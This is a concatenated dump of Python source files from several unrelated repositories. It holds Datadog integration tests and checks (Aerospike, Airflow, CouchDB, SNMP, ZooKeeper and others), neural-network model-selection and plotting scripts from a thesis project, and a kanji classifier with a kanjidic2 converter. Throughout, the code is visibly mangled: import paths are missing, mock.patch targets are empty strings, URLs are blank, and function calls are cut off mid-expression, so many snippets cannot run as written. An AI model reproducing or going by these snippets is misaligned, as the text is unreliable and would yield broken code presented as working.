error_flg is False: access('レビューを終了する') if error_flg is False: print('体温報告を完了しました。') # putting away : 片付け driver.close() ```
{ "source": "01100010011001010110010101110000/integrations-core", "score": 2 }
#### File: aerospike/tests/ ```python import copy import mock import pytest from datadog_checks import aerospike from . import common pytestmark = pytest.mark.unit METRICS = [ 'aerospike.datacenter.dc_timelag', 'aerospike.datacenter.dc_rec_ship_attempts', 'aerospike.datacenter.dc_delete_ship_attempts', 'aerospike.datacenter.dc_remote_ship_ok', 'aerospike.datacenter.dc_err_ship_client', 'aerospike.datacenter.dc_err_ship_server', 'aerospike.datacenter.dc_esmt_bytes_shipped', 'aerospike.datacenter.dc_esmt_ship_avg_comp_pct', 'aerospike.datacenter.dc_latency_avg_ship', 'aerospike.datacenter.dc_remote_ship_avg_sleep', 'aerospike.datacenter.dc_open_conn', 'aerospike.datacenter.dc_recs_inflight', 'aerospike.datacenter.dc_size', ] def test_datacenter_metrics(aggregator): check = aerospike.AerospikeCheck('aerospike', {}, [common.INSTANCE]) original_get_info = check.get_info def mock_get_info(command, separator=";"): if command == 'dcs': return ['test'] elif command.startswith("dc/"): return common.DATACENTER_METRICS return original_get_info(command, separator) check.get_info = mock_get_info check._client = mock.MagicMock() check.get_namespaces = mock.MagicMock() check.collect_info = mock.MagicMock() check.collect_throughput = mock.MagicMock() check.collect_latency = mock.MagicMock() check.collect_version = mock.MagicMock() check.check(common.INSTANCE) for metric in METRICS: aggregator.assert_metric(metric) def connection_uses_tls(): instance = copy.deepcopy(common.INSTANCE) tls_config = {'cafile': 'my-ca-file', 'certfile': 'my-certfile', 'keyfile': 'my-keyfile'} instance['tls_config'] = copy.deepcopy(tls_config) check = aerospike.AerospikeCheck('aerospike', {}, [common.INSTANCE]) tls_config['enable'] = True assert check._tls_config == tls_config with mock.patch('aerospike.client') as client: check.get_client() assert client.called_with({'host': check._host, 'tls': tls_config}) ``` #### File: airflow/tests/ ```python import re import requests # Make sure this expected metrics list is up to date with: # - `dogstatsd_mapper_profiles` configuration from # - metadata.csv EXPECTED_METRICS = [ '<job_name>_start', '<job_name>_end', 'operator_failures_<operator_name>', 'operator_successes_<operator_name>', 'ti_failures', 'ti_successes', 'zombies_killed', 'scheduler_heartbeat', 'dag_processing.processes', 'scheduler.tasks.killed_externally', 'dagbag_size', 'dag_processing.import_errors', 'dag_processing.total_parse_time', 'dag_processing.last_runtime.<dag_file>', 'dag_processing.last_run.seconds_ago.<dag_file>', 'dag_processing.processor_timeouts', 'executor.open_slots', 'executor.queued_tasks', 'executor.running_tasks', 'pool.open_slots.<pool_name>', 'pool.used_slots.<pool_name>', 'pool.starving_tasks.<pool_name>', 'dagrun.dependency-check.<dag_id>', 'dag.<dag_id>.<task_id>.duration', 'dag_processing.last_duration.<dag_file>', 'dagrun.duration.success.<dag_id>', 'dagrun.duration.failed.<dag_id>', 'dagrun.schedule_delay.<dag_id>', ] METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE) def test_check_metrics_up_to_date(): url = '' resp = requests.get(url) content = resp.content.decode('utf-8') matches = METRIC_PATTERN.findall(content) # Printed only on failure for convenience. print("Metric from {} :".format(url)) print("") for metric, desc in matches: print("{:50} {}".format(metric, desc)) metrics = [m for m, desc in matches] assert EXPECTED_METRICS == metrics ``` #### File: datadog_checks/aspdotnet/ ```python try: from datadog_checks.base import PDHBaseCheck except ImportError: class PDHBaseCheck: pass EVENT_TYPE = SOURCE_TYPE_NAME = 'aspdotnet' DEFAULT_COUNTERS = [ # counterset, instance of counter, counter name, metric name # This set is from the Microsoft recommended counters to monitor exchange: # # ASP.Net ["ASP.NET", None, "Application Restarts", "aspdotnet.application_restarts", "gauge"], ["ASP.NET", None, "Worker Process Restarts", "aspdotnet.worker_process_restarts", "gauge"], ["ASP.NET", None, "Request Wait Time", "aspdotnet.request.wait_time", "gauge"], # ASP.Net Applications [ "ASP.NET Applications", None, "Requests In Application Queue", "aspdotnet.applications.requests.in_queue", "gauge", ], ["ASP.NET Applications", None, "Requests Executing", "aspdotnet.applications.requests.executing", "gauge"], ["ASP.NET Applications", None, "Requests/Sec", "aspdotnet.applications.requests.persec", "gauge"], [ "ASP.NET Applications", None, "Forms Authentication Failure", "aspdotnet.applications.forms_authentication.failure", "gauge", ], [ "ASP.NET Applications", None, "Forms Authentication Success", "aspdotnet.applications.forms_authentication.successes", "gauge", ], ] class AspdotnetCheck(PDHBaseCheck): def __init__(self, name, init_config, agentConfig, instances=None): PDHBaseCheck.__init__(self, name, init_config, agentConfig, instances=instances, counter_list=DEFAULT_COUNTERS) ``` #### File: couch/tests/ ```python import json import os from collections import defaultdict from copy import deepcopy from time import sleep import pytest import requests from datadog_checks.couch import CouchDb from import WaitFor, docker_run from import CheckEndpoints from . import common @pytest.fixture def check(): if common.COUCH_MAJOR_VERSION == 1: return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG]) elif common.COUCH_MAJOR_VERSION == 2: return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG_V2]) @pytest.fixture def instance(): if common.COUCH_MAJOR_VERSION == 1: return deepcopy(common.BASIC_CONFIG) elif common.COUCH_MAJOR_VERSION == 2: return deepcopy(common.BASIC_CONFIG_V2) @pytest.fixture def active_tasks(): """ Returns a raw response from `/_active_tasks` """ with open(os.path.join(common.HERE, 'fixtures', '_active_tasks.json')) as f: return json.loads( @pytest.fixture(scope="session") def dd_environment(): """ Start a cluster with one master, one replica and one unhealthy replica and stop it after the tests are done. If there's any problem executing docker-compose, let the exception bubble up. """ couch_version = os.environ["COUCH_VERSION"][0] with docker_run( compose_file=os.path.join(common.HERE, 'compose', 'compose_v{}.yaml'.format(couch_version)), env_vars={'COUCH_PORT': common.PORT}, conditions=[ CheckEndpoints([common.URL]), lambda: generate_data(couch_version), WaitFor(send_replication, args=(couch_version,)), WaitFor(get_replication, args=(couch_version,)), ], ): if couch_version == '1': yield common.BASIC_CONFIG elif couch_version == '2': yield common.BASIC_CONFIG_V2 def send_replication(couch_version): """ Send replication task to trigger tasks """ if couch_version == '1': return replicator_url = "{}/_replicator".format(common.NODE1['server']) replication_body = { '_id': 'my_replication_id', 'source': 'http://dduser:[email protected]:5984/kennel', 'target': 'http://dduser:[email protected]:5984/kennel_replica', 'create_target': True, 'continuous': True, } r = replicator_url, auth=(common.NODE1['user'], common.NODE1['password']), headers={'Content-Type': 'application/json'}, json=replication_body, ) r.raise_for_status() def get_replication(couch_version): """ Attempt to get active replication tasks """ if couch_version == '1': return task_url = "{}/_active_tasks".format(common.NODE1['server']) r = requests.get(task_url, auth=(common.NODE1['user'], common.NODE1['password'])) r.raise_for_status() count = len(r.json()) return count > 0 def generate_data(couch_version): """ Generate data on the couch cluster to test metrics. """ # pass in authentication info for version 2 auth = (common.USER, common.PASSWORD) if couch_version == "2" else None headers = {'Accept': 'text/json'} # Generate a test database requests.put("{}/kennel".format(common.URL), auth=auth, headers=headers) # Populate the database data = { "language": "javascript", "views": { "all": {"map": "function(doc) { emit(doc._id); }"}, "by_data": {"map": "function(doc) { emit(, doc); }"}, }, } requests.put("{}/kennel/_design/dummy".format(common.URL), json=data, auth=auth, headers=headers) urls = [ "{}/_node/[email protected]/_stats".format(common.URL), "{}/_node/[email protected]/_stats".format(common.URL), "{}/_node/[email protected]/_stats".format(common.URL), ] ready = defaultdict(bool) for _ in range(120): print("Waiting for stats to be generated on the nodes...") try: for url in urls: if not ready[url]: res = requests.get(url, auth=auth, headers=headers) if res.json(): ready[url] = True if len(ready) and all(ready.values()): break except Exception: pass sleep(1) if couch_version == "1": return doc_url = "{}/_replicator/_all_docs".format(common.URL) for _ in range(120): try: res = requests.get(doc_url, auth=auth, headers=headers) data = res.json() if data.get('rows'): break except Exception: pass sleep(1) ``` #### File: tests/tooling/ ```python import os import mock from import copy_default_config from import ( complete_set_root, get_version_string, initialize_root, parse_agent_req_file, ) from ..common import not_windows_ci def test_parse_agent_req_file(): contents = "datadog-active-directory==1.1.1; sys_platform == 'win32'\nthis is garbage" catalog = parse_agent_req_file(contents) assert len(catalog) == 1 assert catalog['datadog-active-directory'] == '1.1.1' def test_get_version_string(): with mock.patch('') as read: read.return_value = '__version__ = "2.0.0"' assert get_version_string('foo_check') == '2.0.0' @mock.patch('') @mock.patch('') def test_initialize_root_bad_path(set_root, get_root): get_root.return_value = '' # bad path in config results in cwd config = copy_default_config() config['core'] = '/path/does/not/exist' initialize_root(config) assert set_root.called set_root.assert_called_with(os.getcwd()) @mock.patch('') @mock.patch('') def test_initialize_root_good_path(set_root, get_root): get_root.return_value = '' # good path in config uses that config = copy_default_config() config['core'] = '~' initialize_root(config) assert set_root.called set_root.assert_called_with(os.path.expanduser('~')) @not_windows_ci @mock.patch('') @mock.patch('') def test_initialize_root_env_var(set_root, get_root): get_root.return_value = '' ddev_env = '/tmp' with mock.patch.dict(os.environ, {'DDEV_ROOT': ddev_env}): config = copy_default_config() initialize_root(config) assert set_root.called set_root.assert_called_with(os.path.expanduser(ddev_env)) @not_windows_ci @mock.patch('') @mock.patch('') def test_complete_set_root_no_args(set_root, get_root): get_root.return_value = '' with mock.patch('') as load_config: config = copy_default_config() config['core'] = '/tmp' # ensure we choose a dir that exists load_config.return_value = config args = [] complete_set_root(args) assert set_root.called set_root.assert_called_with(config['core']) @mock.patch('') @mock.patch('') def test_complete_set_root_here(set_root, get_root): get_root.return_value = '' with mock.patch('') as load_config: config = copy_default_config() load_config.return_value = config args = ['-x'] complete_set_root(args) assert set_root.called set_root.assert_called_with(os.getcwd()) @not_windows_ci @mock.patch('') @mock.patch('') def test_complete_set_root_extras(set_root, get_root): get_root.return_value = '' with mock.patch('') as load_config: config = copy_default_config() config['extras'] = '/tmp' # ensure we choose a dir that exists load_config.return_value = config args = ['-e'] complete_set_root(args) assert set_root.called set_root.assert_called_with(config['extras']) ``` #### File: ibm_mq/tests/ ```python import pytest from .common import assert_all_metrics @pytest.mark.e2e def test_e2e_check_all(dd_agent_check, instance_collect_all): aggregator = dd_agent_check(instance_collect_all, rate=True) assert_all_metrics(aggregator) ``` #### File: datadog_checks/snmp/ ```python from typing import Any, Sequence, Tuple, Union from .exceptions import CouldNotDecodeOID from .pysnmp_types import ObjectIdentity, ObjectName, ObjectType from .utils import format_as_oid_string, parse_as_oid_tuple class OID(object): """ An SNMP object identifier. Acts as a facade for various types used by PySNMP to represent OIDs. """ def __init__(self, value): # type: (Union[Sequence[int], str, ObjectName, ObjectIdentity, ObjectType]) -> None try: parts = parse_as_oid_tuple(value) except CouldNotDecodeOID: raise # Explicitly re-raise this exception. # Let's make extra sure we didn't mess up. if not isinstance(parts, tuple): raise RuntimeError( 'Expected result {!r} of parsing value {!r} to be a tuple, but got {}'.format(parts, value, type(parts)) ) # pragma: no cover self._parts = parts def as_tuple(self): # type: () -> Tuple[int, ...] return self._parts def __eq__(self, other): # type: (Any) -> bool return isinstance(other, OID) and self.as_tuple() == other.as_tuple() def __str__(self): # type: () -> str return format_as_oid_string(self.as_tuple()) def __repr__(self): # type: () -> str return 'OID({!r})'.format(str(self)) ``` #### File: datadog_checks/system_swap/ ```python import psutil # project from datadog_checks.checks import AgentCheck class SystemSwap(AgentCheck): def check(self, instance): swap_mem = psutil.swap_memory() tags = instance.get('tags', []) self.rate('system.swap.swapped_in', swap_mem.sin, tags=tags) self.rate('system.swap.swapped_out', swap_mem.sout, tags=tags) ``` #### File: tests/legacy/ ```python import mock import pytest from datadog_checks.vsphere.legacy.vsphere_legacy import VSphereLegacyCheck from .utils import disable_thread_pool, get_mocked_server def _instance(): """ Create a default instance, used by multiple fixtures """ return {'name': 'vsphere_mock', 'tags': ['foo:bar']} @pytest.fixture def instance(): """ Return a default instance """ return _instance() @pytest.fixture def vsphere(): """ Provide a check instance with mocked parts """ # mock the server server_mock = get_mocked_server() # create a check instance check = VSphereLegacyCheck('vsphere', {}, [_instance()]) # patch the check instance check._get_server_instance = mock.MagicMock(return_value=server_mock) # return the check after disabling the thread pool return disable_thread_pool(check) @pytest.fixture def aggregator(): from datadog_checks.stubs import aggregator aggregator.reset() return aggregator ``` #### File: zk/tests/ ```python import os from datadog_checks.zk import ZookeeperCheck ZK_VERSION = os.environ['ZK_VERSION'] MNTR_METRICS = [ 'zookeeper.packets_sent', 'zookeeper.approximate_data_size', 'zookeeper.num_alive_connections', 'zookeeper.open_file_descriptor_count', 'zookeeper.avg_latency', 'zookeeper.znode_count', 'zookeeper.outstanding_requests', 'zookeeper.min_latency', 'zookeeper.ephemerals_count', 'zookeeper.watch_count', 'zookeeper.max_file_descriptor_count', 'zookeeper.packets_received', 'zookeeper.max_latency', ] METRICS_34 = [ 'zookeeper.packets.sent', 'zookeeper.latency.avg', 'zookeeper.latency.min', 'zookeeper.connections', 'zookeeper.zxid.epoch', 'zookeeper.bytes_sent', 'zookeeper.bytes_received', 'zookeeper.instances', 'zookeeper.nodes', 'zookeeper.zxid.count', 'zookeeper.packets.received', 'zookeeper.latency.max', ] def assert_service_checks_ok(aggregator): aggregator.assert_service_check("zookeeper.ruok", status=ZookeeperCheck.OK) aggregator.assert_service_check("zookeeper.mode", status=ZookeeperCheck.OK) ```
{ "source": "011000101101/Bachelor_Arbeit", "score": 3 }
#### File: NeuronalNetworks/combined_project/ ```python from train_model_lstm import * def train_model_tmp(model: tf.keras.Model, list_of_batches: list, current_basepath: str): tensorboard_cb = tf.keras.callbacks.TensorBoard(current_basepath, histogram_freq=1) x_train = np.asarray([data.coordinate_pairs for data in list_of_batches[0]]) x_train = x_train.reshape(batch_size, len(list_of_batches[0][0].coordinate_pairs), 2) y_train = np.asarray([data.true_cost for data in list_of_batches[0]]), y_train, epochs=1, callbacks=[tensorboard_cb]) def train_one_model_variant_tmp(lstm_layer_count, dense_layer_count, list_of_batches, data_validate): print("\n\n\ntraining model '{}_lstm_layers_{}_dense_layers_{}'\n\n\n".format( lstm_layer_count, dense_layer_count, "inflating" )) current_model = define_model(lstm_layer_count, dense_layer_count, "inflating", False) current_basepath = os.path.abspath( "./models/tmp/{}_lstm_layers_{}_dense_layers".format( lstm_layer_count, dense_layer_count ) ) train_model_tmp(current_model, list_of_batches, current_basepath) lstm_layer_counts = [3, 2, 1] dense_layer_counts = [2, 1] if __name__ == "__main__": # load train data characteristics batches, data_val = load_data() # HPO loop (grid search over few points because of long runtime) for current_lstm_layer_count in lstm_layer_counts: for current_dense_layer_count in dense_layer_counts: train_one_model_variant_tmp(current_lstm_layer_count, current_dense_layer_count, batches, data_val) ``` #### File: combined_project/model_selection/ ```python import matplotlib.pyplot as plt from matplotlib import cm from mpl_toolkits import mplot3d import plotly.graph_objects as go import os import pickle import pandas as pd from model_selection.util import * with open("runtime_quality_map.pkl", "rb") as f: runtime_quality_map = pickle.load(f) def get_score(model: str, fixed_value: tuple) -> int: circuit, score = fixed_value quality = runtime_quality_map[(model, circuit)] if score == "channel_width": return np.asarray(quality[2][0]).mean() else: # critical path length return np.asarray(quality[2][1]).mean() def plot_model_scores_over_circuit(type: str): models = os.listdir(rnn_model_base_path if type == "rnn" else cnn_model_base_path) labels = [eval_circuits[0], 'combined', eval_circuits[1]] def plot_model_scores_over_hyperparams(circuit, metric, reference): """ over layer defs (X) and inflation type (+ filter size) (Y) :param type: :return: """ # models_cnn = os.listdir(cnn_model_base_path) # models_rnn = os.listdir(rnn_model_base_path) # # # layer defs # special_layer_counts = [model_name.split("_")[0] for model_name in models] # dense_layer_counts = [model_name.split("_")[3] for model_name in models] # inflation types y_labels_cnn = ["0 conv2d layers", "1 conv2d layer", "2 conv2d layers"] x_labels_cnn = ["inflating, 3", "deflating, 3", "inflating, 7", "deflating, 7"] def f_cnn(x_in, y_in, fixed_value): tmp = get_score( "{}_conv_layers_{}_kernel_size_{}".format( int(y_in), ("inflating" if x_in % 2 == 0 else "deflating"), (-1 if y_in == 0 else (3 if (x_in // 2) % 2 == 0 else 7)) ), fixed_value ) return tmp if tmp > 0 else 0.1 plot_scores_of_one_model_in_3d( "mean achieved {}\nCNN models on circuit '{}'".format(metric, circuit), x_labels_cnn, y_labels_cnn, 'layer dimensions, conv2d kernel size', 'layers', metric, f_cnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None ) y_labels_rnn = ["(1, 1)", "(1, 2)", "(2, 1)", "(2, 2)", "(3, 1)", "(3, 2)"] x_labels_rnn = ["inflating", "deflating", "bloating"] def f_rnn(x_in, y_in, fixed_value): tmp = get_score( "{}_lstm_layers_{}_dense_layers_{}".format( int(y_in) // 2 + 1, int(y_in) % 2 + 1, ("inflating" if x_in == 0 else "deflating" if x_in == 1 else "bloating") ), fixed_value ) return tmp if tmp > 0 else 0.1 plot_scores_of_one_model_in_3d( "mean achieved {}\nRNN models on circuit '{}'".format(metric, circuit), x_labels_rnn, y_labels_rnn, 'layer dimensions', 'lstm layers, dense layers', metric, f_rnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None ) print("reference value for {}: {}".format(metric, get_score("reference", (circuit, metric)))) def plot_scores_of_one_model_in_3d(title, x_labels: list, y_labels: list, x_axis_label: str, y_axis_label: str, z_axis_label: str, mapping_func, fixed_value, reference_value): # def symlog_shift(arr, shift=0): # # shift array-like to symlog array with shift # logv = np.abs(arr) * (10. ** shift) # logv[np.where(logv < 1.)] = 1. # logv = np.sign(arr) * np.log10(logv) # return logv # # def symlog_shift_ticks(tks1, tks2, tks3, shift=0): # # generate the tick position and the corresponding tick labels in symlog scale with shift # # tks1, tks2, tks3: tick values in log scale # # # tick positions to show in graph # tkps = [-v - shift for v in tks1] + tks2 + [v + shift for v in tks3] # # tkck labels in str # tkls = ['$-10^{%d}$' % (v) for v in tks1] + [''] + ['$10^{%d}$' % (v) for v in tks3] # return tkps, tkls def color(val): return cm.coolwarm(val) SHIFT = 1 x = np.linspace(0, len(x_labels)-1, len(x_labels)) # number of augmentation methods y = np.linspace(0, len(y_labels)-1, len(y_labels)) X, Y = np.meshgrid(x, y) x_flat = X.flatten() y_flat = Y.flatten() Z = [mapping_func(x_flat[i], y_flat[i], fixed_value) for i in range(len(x_labels)*len(y_labels))] Z = np.reshape(Z, (len(y_labels), len(x_labels))) # Z = symlog_shift(Z,shift=SHIFT) # ztkps, ztkls = symlog_shift_ticks([2, 1, 0, -1], [0], [-1, 0, 1, 2], shift=SHIFT) Z_colors = np.array([[color(z) for z in row] for row in Z]).reshape(Z.shape + (-1,)) fig = plt.figure() ax = plt.axes(projection='3d') ax.set_xticks(range(len(x_labels))) ax.set_xticklabels(x_labels, horizontalalignment='right') ax.set_yticks(range(len(y_labels))) ax.set_yticklabels(y_labels, horizontalalignment='left') # ax.set_zticks(ztkps) # ax.set_zticklabels(ztkls) if reference_value is not None: Z_const = [reference_value for i in range(len(x_labels) * len(y_labels))] Z_const = np.reshape(Z_const, (len(y_labels), len(x_labels))) ax.plot_surface(X, Y, Z_const, label='reference score', rstride=1, cstride=1, cmap='viridis', edgecolor='none') ax.plot_surface(X, Y, Z, rstride=1, label='achieved score', cstride=1, cmap='viridis', edgecolor='none') # ax.set_title('evaluation on model \"{}\"'.format(model.__str__())) ax.set_title(title) ax.set_xlabel(x_axis_label, labelpad=16) ax.set_ylabel(y_axis_label, labelpad=2) ax.set_zlabel(z_axis_label) # ax.set_zlim((0, 5)) # ax.set_zbound((0, 5)) ax.tick_params(labelsize=6) ax.tick_params(axis='x', pad=-4) ax.tick_params(axis='y', rotation=350, pad=-4) ax.view_init(30, 330) def print_result_table(circuit): keys = list(runtime_quality_map.keys()) keys = [entry for entry in keys if isinstance(entry, tuple)] keys = [entry for entry in keys if entry[1] == circuit] keys = [entry for entry in keys if "lstm" in entry[0]] tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys] dict_lstm = dict( zip( tuples, [ { "channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2), "critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2) } for key in keys ] ) ) index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure']) df = pd.DataFrame(dict_lstm, columns=index).transpose() df.to_latex("model_selection_lstm_performance_table_{}_latex.txt".format(circuit)) keys = list(runtime_quality_map.keys()) keys = [entry for entry in keys if isinstance(entry, tuple)] keys = [entry for entry in keys if entry[1] == circuit] keys = [entry for entry in keys if "conv" in entry[0]] tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys] dict_cnn = dict( zip( tuples, [ { "channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2), "critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2) } for key in keys ] ) ) index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size']) df = pd.DataFrame(dict_cnn, columns=index).transpose() df.to_latex("model_selection_cnn_performance_table_{}_latex.txt".format(circuit)) def print_result_table_full(circuit): keys = list(runtime_quality_map.keys()) keys = [entry for entry in keys if isinstance(entry, tuple)] keys = [entry for entry in keys if entry[1] == circuit] keys = [entry for entry in keys if "lstm" in entry[0]] tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys] row_tuples = [("channel_width", "1"), ("channel_width", "2"), ("channel_width", "3"), ("channel_width", "mean"), ("critical_path", "1"), ("critical_path", "2"), ("critical_path", "3"), ("critical_path", "mean")] values = [ { ("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2), ("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2), ("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2), ("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2), ("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2), ("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2), ("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2), ("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2) } for key in keys ] dict_eval = dict( zip( tuples, values ) ) index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure']) index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt']) df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose() print(df) df.to_latex("model_selection_lstm_performance_table_{}_latex_full.txt".format(circuit)) keys = list(runtime_quality_map.keys()) keys = [entry for entry in keys if isinstance(entry, tuple)] keys = [entry for entry in keys if entry[1] == circuit] keys = [entry for entry in keys if "conv" in entry[0]] tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys] row_tuples = [("channel_width", "1"), ("channel_width", "2"), ("channel_width", "3"), ("channel_width", "mean"), ("critical_path", "1"), ("critical_path", "2"), ("critical_path", "3"), ("critical_path", "mean")] values = [ { ("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2), ("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2), ("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2), ("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2), ("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2), ("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2), ("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2), ("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2) } for key in keys ] dict_eval = dict( zip( tuples, values ) ) index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size']) index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt']) df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose() print(df) df.to_latex("model_selection_cnn_performance_table_{}_latex_full.txt".format(circuit)) def print_best_model(circuit): keys = list(runtime_quality_map.keys()) keys = [entry for entry in keys if isinstance(entry, tuple)] keys = [entry for entry in keys if entry[1] == circuit] results = [(key, runtime_quality_map[key][2][0]) for key in keys] results = [(key, np.median(np.asarray(value))) for key, value in results] results_rnn = [(key, value) for key, value in results if "lstm" in key[0]] values_rnn = [value for key, value in results_rnn] result_rnn = [key for key, value in results_rnn if value == min(values_rnn)] print(result_rnn) print("best rnn: {} with channel_width {}".format( result_rnn[0] if len(result_rnn) == 1 else result_rnn[1], min(values_rnn)) # does not change optimality of choice, but produces the chosen best_rnn on present data... ) results_cnn = [(key, value) for key, value in results if "conv" in key[0]] values_cnn = [value for key, value in results_cnn] result_cnn = [key for key, value in results_cnn if value == min(values_cnn)] print(result_cnn) print("best cnn: {} with channel_width {}".format( result_cnn[0] if len(result_cnn) == 1 else result_cnn[1], min(values_cnn)) ) if __name__ == "__main__": plot_model_scores_over_hyperparams(eval_circuits[0], "channel_width", reference=True) plot_model_scores_over_hyperparams(eval_circuits[0], "critical path length (ns)", reference=True) print_result_table(eval_circuits[0]) print_result_table_full(eval_circuits[0]) print_best_model(eval_circuits[0]) ```
{ "source": "011000101101/VRAR_project", "score": 3 }
#### File: VRAR_project/classifier_subsystem/ ```python import numpy as np import os import cv2 import pickle from sklearn import neighbors import os from utils.params import * from utils.image_augmenting import add_noise_greyscale def train(model, X, y, name: str): """ train a model on the given training set and optionally save it to disk :param model: the model to train :param X: the sample images, list of numpy arrays (greyscale images) :param y: the target labels, list of strings (kanji) :param name: name of the model used to save it on disk, or None if it is not to be saved :return: the trained model """ # reshape X to 2d X = np.asarray(X) X = X.reshape((X.shape[0], -1)) print("fitting on {} samples".format(len(y))) # train the model print("begin fitting"), y) print("done fitting") # optionally save trained model if name is not None: with open("trained_{}.pkl".format(name), 'wb') as f: pickle.dump(model, f, pickle.HIGHEST_PROTOCOL) return model def evaluate(model_or_name, X, y, interactive: bool = False): """ evaluate a model on the given evaluation set :param model_or_name: either the model itself, or the name of a pretrained and saved model as string :param X: the sample images, list of numpy arrays (greyscale images) :param y: the target labels, list of strings (kanji) :param interactive: flag to visually explore the evaluation set and the predictions made :return: performance score as number of samples given and number of correct predictions made """ # get model if isinstance(model_or_name, str): # name of model passed... # load from disk with open("trained_{}.pkl".format(model_or_name), 'rb') as f: model = pickle.load(f) else: # model passed directly... model = model_or_name # use correct = 0 print("evaluating on {} samples...".format(len(X))) # for each sample image in evaluation set for index in range(len(X)): # predict the kanji it depicts Z = model.predict(X[index].reshape((1, -1))) # count correct predictions if Z[0] == y[index]: correct += 1 # interactively explore sample images and predictions if interactive: cv2.imshow("asdf", X[index]);cv2.waitKey();cv2.destroyAllWindows() print(Z) print(y[index]) print("correct" if Z[0] == y[index] else "wrong") print("\n") print("finished evaluating.") # return total number of predictions made and number of correct predictions return len(X), correct def predict(model, X: np.ndarray) -> str: """ predicts the kanji for a single image :param model: the classifier model :param X: the sample image, 2d numpy array (greyscale) :return: the redicted label/kanji """ return model.predict(X.reshape((1, -1))) ``` #### File: VRAR_project/precompute/ ```python import xml.etree.ElementTree as ET import pickle import os from utils.params import * import utils.stringutils as stringutils def hiraganify_single_on_yomi(on_yomi: str): utf8_bytes = list(on_yomi.encode("utf-8")) kun_yomi = "" for char in on_yomi: if char == 'ー': # new_char = kun_yomi[len(kun_yomi)-1] kun_yomi += 'あ' # TODO dirty workaround for only occurence of 'ー' (ダース) continue # convert utf-9 string of single char to byte array holding its utf-8 codepoint char_bytes = list(char.encode("utf-8")) # skip non-katakana chars if char_bytes[0] != 227: continue ## assertion holds on full dataset # assert ( # (char_bytes[1] == 130 and 161 <= char_bytes[2] <= 191) # or # (char_bytes[1] == 131 and 128 <= char_bytes[2] <= 182) # ), "{} is not a katakana char: {}".format(char, char_bytes) # 82a1 <= ... <= 83B6 # change katakana char to equivalent hiragana char according to utf-8 codepoint table if char_bytes[1] == 130: # 82 char_bytes[1] = 129 char_bytes[2] -= 32 # bf - 9f, distance of "ta" elif char_bytes[1] == 131: if char_bytes[2] < 160: # a0 char_bytes[1] = 129 char_bytes[2] += 32 # 9f - bf, distance of "mi" else: char_bytes[1] = 130 char_bytes[2] -= 32 # a0 - 80, distance of "mu" else: continue # skip non-katakana chars # convert byte array holding utf-8 codepoint of single char back to utf-8 string new_char = bytes(char_bytes).decode("utf-8") # concatenate the characters kun_yomi += new_char return kun_yomi def hiraganify_on_yomi(readings_on: list): return list(map(hiraganify_single_on_yomi, readings_on)) def isolate_actual_readings(readings_kun: list): return [extended_reading.split('.')[0] for extended_reading in readings_kun] def cut_non_hiragana_chars(kun_yomi: str): utf8_bytes = list(kun_yomi.encode("utf-8")) hiragana_only = "" for char in kun_yomi: if char == 'ー': hiragana_only += 'ー' continue if not stringutils.is_kana(char): continue # concatenate the characters hiragana_only += char return hiragana_only def entry_list_to_map(entries_in: list): kanji_dict = {} for entry in entries_in: kanji = entry.find("literal").text readings_on = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_on']")] readings_kun = [reading.text for reading in entry.findall("reading_meaning/rmgroup/reading[@r_type='ja_kun']")] readings_nanori = [reading.text for reading in entry.findall("reading_meaning/nanori")] readings = hiraganify_on_yomi(readings_on) + list( map(cut_non_hiragana_chars, isolate_actual_readings(readings_kun)) ) readings_nanori = list(map(cut_non_hiragana_chars, readings_nanori)) kanji_dict[kanji] = (readings, readings_nanori) return kanji_dict def convert(): tree = ET.parse(os.path.join(ROOT_DIR, "resources/kanjidic2/kanjidic2.xml")) entries = tree.findall("character") kanji_dict_map = entry_list_to_map(entries) with open(os.path.join(ROOT_DIR, "bin_blobs/kanjidic2_hashtable.pkl"), 'wb') as f: pickle.dump(kanji_dict_map, f, pickle.HIGHEST_PROTOCOL) if __name__ == "__main__": convert() ```
{ "source": "011235813/lola", "score": 2 }
